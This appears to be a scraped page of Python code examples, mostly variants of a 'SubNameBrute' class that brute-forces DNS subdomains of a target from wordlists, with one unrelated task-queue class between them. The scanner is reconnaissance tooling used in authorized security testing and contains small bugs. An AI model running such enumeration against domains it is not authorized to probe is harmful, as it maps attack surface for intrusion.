        self.scan_count = self.found_count = 0
        self.console_width = os.get_terminal_size()[0] - 2

        # create dns resolver pool ~ workers
        self.resolvers = [
            dns.resolver.Resolver(configure=False)
            for _ in range(options.threads)
        ]
        for resolver in self.resolvers:
            resolver.lifetime = resolver.timeout = 10.0

        self.print_count = 0
        self.STOP_ME = False

        # load dns servers and check whether these dns servers works fine ?
        self._load_dns_servers()

        # load sub names
        self.subs = []  # subs in file
        self.goodsubs = []  # checks ok for further exploitation
        self._load_subname('dict/subnames.txt', self.subs)

        # load sub.sub names
        self.subsubs = []
        self._load_subname('dict/next_sub.txt', self.subsubs)

        # results will save to target.txt

        global path

        path = os.path.join("results", target)
        if not os.path.exists(path):
            os.makedirs(path)

        self.outfile = open('%s/%s.txt' % (path, target), 'w')

        self.ip_dict = set()  #
        self.found_sub = set()

        # task queue
        self.queue = PriorityQueue()
        for sub in self.subs:
            self.queue.put(sub)

    """
        Load DNS Servers(ip saved in file), and check whether the DNS servers works fine
    """

    def _load_dns_servers(self):
        print('[*] Validate DNS servers ...')
        self.dns_servers = []

        # create a process pool for checking DNS servers, the number is your processors(cores) * 2, just change it!
        processors = cpu_count() * 2
        pool = Pool(processors)

        # read dns ips and check one by one
        for server in open('dict/dns_servers.txt').readlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server, ))

        pool.join()  # waiting for process finish
        self.dns_count = len(self.dns_servers)

        sys.stdout.write('\n')
        dns_info = '[+] Found {} available DNS Servers in total'.format(
            self.dns_count)
        print(dns_info)

        if self.dns_count == 0:
            print('[ERROR] No DNS Servers available.')
            sys.exit(-1)

    """
        test these dns servers whether works fine
    """

    def _test_server(self, server):

        # create a dns resolver and set timeout
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0

        try:
            resolver.nameservers = [server]

            answers = resolver.query('public-dns-a.baidu.com')
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            self.dns_servers.append(server)
        except:
            self._print_msg('[-] Check DNS Server %s <Fail>   Found %s' %
                            (server.ljust(16), len(self.dns_servers)))

        self._print_msg('[+] Check DNS Server %s < OK >   Found %s' %
                        (server.ljust(16), len(self.dns_servers)))

    """
        load sub names in dict/*.txt, one function would be enough
        file for read, subname_list for saving sub names
    """

    def _load_subname(self, file, subname_list):
        self._print_msg('[*] Load sub names ...')

        with open(file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in subname_list:
                    tmp_set = {sub}
                    """
                        in case of the sub names which contains the following expression
                        and replace them {alphnum}, {alpha}, {num} with character and num
                    """
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(
                                    item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace(
                                    '{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in subname_list:
                            subname_list.append(item)

    """
        for better presentation of brute force results, not really matters ...
    """

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            self.print_count += 1
            if self.print_count < 100:
                return
            self.print_count = 0
            msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                self.found_count, self.queue.qsize(), self.scan_count,
                time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                             msg)
        elif _msg.startswith('[+] Check DNS Server'):
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)))
        else:
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)) + '\n')
            if _found_msg:
                msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                    self.found_count, self.queue.qsize(), self.scan_count,
                    time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                                 msg)
        sys.stdout.flush()

    def _print_domain(self, msg):
        console_width = os.get_terminal_size()[0]
        msg = '\r' + msg + ' ' * (console_width - len(msg))
        # msg = '\033[0;31;47m%s{}\033[0m'.format(msg)
        sys.stdout.write(msg)

    def _print_progress(self):
        """
            显示扫描进度,显示更美观
        """
        msg = '\033[0;31;47m%s\033[0m found | %s remaining | %s scanned in %.2f seconds' % \
              (self.found_count, self.queue.qsize(), self.scan_count, time.time()- self.start_time)

        console_width = os.get_terminal_size()[0]
        out = '\r' + ' ' * int((console_width - len(msg)) / 2) + msg
        sys.stdout.write(out)

    """
        important : assign task to resolvers
    """

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            sub = self.queue.get(timeout=1.0)
            self.scan_count += 1

            try:
                cur_sub_domain = sub + '.' + self.target
                answers = self.resolvers[j].query(cur_sub_domain)
            except:
                continue

            if answers:
                ips = ', '.join(sorted([answer.address for answer in answers]))

                # exclude : intranet or kept addresses
                if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0', '0.0.0.1']:
                    continue
                if SubNameBrute.is_intranet(answers[0].address):
                    continue

                self.found_sub.add(cur_sub_domain)
                for answer in answers:
                    self.ip_dict.add(answer.address)

                if sub not in self.goodsubs:
                    self.goodsubs.append(sub)

                self.found_count += 1
                ip_info = '{} \t {}'.format(cur_sub_domain, ips)
                # print(ip_info)
                self.outfile.write(cur_sub_domain + '\t' + ips + '\n')
                self._print_domain(ip_info)
                sys.stdout.flush()
                self._print_progress()
                sys.stdout.flush()

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    """
        assign task to threads ...
    """

    def run(self):
        threads = [
            gevent.spawn(self._scan, i) for i in range(self.options.threads)
        ]

        print('[*] Initializing %d threads' % self.options.threads)

        try:
            gevent.joinall(threads)
        except KeyboardInterrupt as e:
            msg = '[WARNING] User aborted.'
            sys.stdout.write('\r' + msg + ' ' *
                             (self.console_width - len(msg)) + '\n\r')
            sys.stdout.flush()
示例#33
0
class TaskList:
    """
    Task list if a FIFO queue of tasks
    """
    def __init__(self, service):
        self.service = service
        self._queue = PriorityQueue()
        # done keeps the tasks that have been extracted from the queue
        # so we can inspect them later

        # keep the done task on disk, not in memory.
        # now we use the filesystem, but we could plug any key-value stor or database behind
        # check TaskStorageBase to see the interface your storage needs to have
        # to be used to store tasks
        # self._done = TaskStorageFile(self)
        self._done = TaskStorageSqlite(self)
        # pointer to current task
        self._current = None
        self._current_mu = Semaphore()

    @property
    def current(self):
        with self._current_mu:
            return self._current

    @current.setter
    def current(self, value):
        with self._current_mu:
            self._current = value

    def __del__(self):
        if self._done:
            self._done.close()

    def get(self):
        """
        pop out a task from the task list
        this call is blocking when the task list is empty
        """
        _, task = self._queue.get()
        self.current = task
        nr_task_waiting.labels(service_guid=self.service.guid).dec()
        return task

    def put(self, task, priority=PRIORITY_NORMAL):
        """
        append task to the task list
        """
        if not isinstance(task, Task):
            raise ValueError(
                "task should be an instance of the Task class not %s" %
                type(task))
        task._priority = priority
        nr_task_waiting.labels(service_guid=self.service.guid).inc()
        self._queue.put((priority, task))

    def done(self, task):
        """
        notify that a task is done
        """
        if task._priority != PRIORITY_SYSTEM:
            self.current = None
            self._done.add(task)

    def empty(self):
        """
        return True if the task list is empty, False otherwise
        """
        return self._queue.empty()

    def clear(self):
        """
        clear emtpy the task list from all its tasks
        """

        try:
            while not self.empty():
                self._queue.get_nowait()
        except gevent.queue.Empty:
            return

    def list_tasks(self, all=False):
        """
        @param all: if True, also return the task that have been executed
                    if False only return the task waiting in the task list
        returns all the task that are currently in the task list
        """
        tasks = [x[1] for x in self._queue.queue]
        if all:
            tasks.extend(self._done.list())

        if self.current and self.current.state == TASK_STATE_RUNNING:
            # also return the current running
            # task as part of the task list
            tasks.insert(0, self.current)

        return tasks

    def get_task_by_guid(self, guid):
        """
        return a task from the list by it's guid
        """

        # FIXME: this is really inefficient
        def find_task(guid, l):
            for task in l:
                if task.guid == guid:
                    return task
            raise TaskNotFoundError()

        # check if it's not the current running task
        if self.current and self.current.guid == guid:
            return self.current

        # search in waiting tasks
        try:
            task = find_task(guid, [x[1] for x in self._queue.queue])
            return task
        except TaskNotFoundError:
            pass

        # search in done task
        # this will raise TaskNotFoundError if can't find the task
        return self._done.get(guid)

    def save(self, path):
        """
        serialize the task list to disk
        @param path: file path where to serialize the task list
        """
        def serialize_task(task):
            return {
                "guid": task.guid,
                "action_name": task.action_name,
                "args": task._args,
                "state": task.state,
                "eco": json.loads(task.eco.json) if task.eco else None,
                "created": task.created,
            }

        output = []
        for task in self.list_tasks(all=False):
            output.append(serialize_task(task))
        j.data.serializer.yaml.dump(path, output)

    def load(self, path):
        """
        load a task list that have been serialized with save method
        @param path: file path where the task list is serialized
        @param service: the service object to which this task list belongs
        """
        if not os.path.exists(path):
            return

        data = j.data.serializer.yaml.load(path)
        for task in data:
            if task['state'] in [TASK_STATE_NEW, TASK_STATE_RUNNING]:
                self.put(_instantiate_task(task, self.service))
            else:
                # None supported state, just skip it
                continue
示例#34
0
class SubNameBrute:
    def __init__(self, target, options, process_num, dns_servers, cdns,next_subs,
                 scan_count, found_count, queue_size_list, tmp_dir):
        self.target = target.strip()
        self.options = options
        self.process_num = process_num
        self.dns_servers = dns_servers
        self.cdns = cdns

        self.dns_count = len(dns_servers)
        self.next_subs = next_subs
        self.scan_count = scan_count
        self.scan_count_local = 0
        self.found_count = found_count
        self.found_count_local = 0
        self.queue_size_list = queue_size_list

        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _r in self.resolvers:
            _r.lifetime = _r.timeout = 6.0
        self.queue = PriorityQueue()
        self.item_index = 0
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = dns_servers
        self.local_time = time.time()
        self.outfile = open('%s/%s_part_%s.txt' % (tmp_dir, target, process_num), 'w')

    def _load_sub_names(self):
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                print_msg('[ERROR] Names file not found: %s' % self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        if regex_list:
            pattern = '|'.join(regex_list)
            _regex = re.compile(pattern)
            for line in normal_lines[:]:
                if _regex.search(line):
                    normal_lines.remove(line)

        for item in normal_lines[self.process_num::self.options.process]:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines[self.process_num::self.options.process]:
            self.queue.put((88888888, item))

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def check_cdn(self, cname):
        '''
        bTrue = True
        bFound = False
        i = 0
        while bTrue:
          cdn = self.cdns[i]
          i += 1
          if (cdn in cname) or (i == len(self.cdns)):
            if (cdn in cname): bFound = True
            bTrue = False
        return bFound
        '''
        for cdn in self.cdns:
          if cdn in cname:
            return True
        return False

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=3.0)[1]
                self.scan_count_local += 1
                if time.time() - self.local_time > 3.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_list[self.process_num] = self.queue.qsize()
            except Exception as e:
                break
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    ans = self.resolvers[j].query(cur_sub_domain,'cname')
                    cname = ans[0].target.to_unicode().rstrip('.')

                    if self.check_cdn(cname):
                      continue 
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.options.i and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1
                        if self.ip_dict[(_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1
                    if time.time() - self.local_time > 3.0:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                        self.queue_size_list[self.process_num] = self.queue.qsize()
                        self.local_time = time.time()

                    msg = cur_sub_domain.ljust(30) + ips
                    # print_msg(msg, line_feed=True)

                    self.outfile.write(cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
示例#35
0
class SubNameBrute:
    def __init__(self, target, options, process_num, dns_servers, next_subs,
                 scan_count, found_count, queue_size_list, tmp_dir):
        self.target = target.strip()
        self.options = options
        self.process_num = process_num
        self.dns_servers = dns_servers
        self.dns_count = len(dns_servers)
        self.next_subs = next_subs
        self.scan_count = scan_count
        self.scan_count_local = 0
        self.found_count = found_count
        self.found_count_local = 0
        self.queue_size_list = queue_size_list

        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _r in self.resolvers:
            _r.lifetime = _r.timeout = 6.0
        self.queue = PriorityQueue()
        self.item_index = 0
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = dns_servers
        self.local_time = time.time()
        self.outfile = open('%s/%s_part_%s.txt' % (tmp_dir, target, process_num), 'w')

    def _load_sub_names(self):
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                print_msg('[ERROR] Names file not found: %s' % self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        if regex_list:
            pattern = '|'.join(regex_list)
            _regex = re.compile(pattern)
            for line in normal_lines[:]:
                if _regex.search(line):
                    normal_lines.remove(line)

        for item in normal_lines[self.process_num::self.options.process]:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines[self.process_num::self.options.process]:
            self.queue.put((88888888, item))

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=3.0)[1]
                self.scan_count_local += 1
                if time.time() - self.local_time > 3.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_list[self.process_num] = self.queue.qsize()
            except Exception as e:
                break
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.options.i and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1
                        if self.ip_dict[(_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1
                    if time.time() - self.local_time > 3.0:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                        self.queue_size_list[self.process_num] = self.queue.qsize()
                        self.local_time = time.time()

                    msg = cur_sub_domain.ljust(30) + ips
                    # print_msg(msg, line_feed=True)

                    self.outfile.write(cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass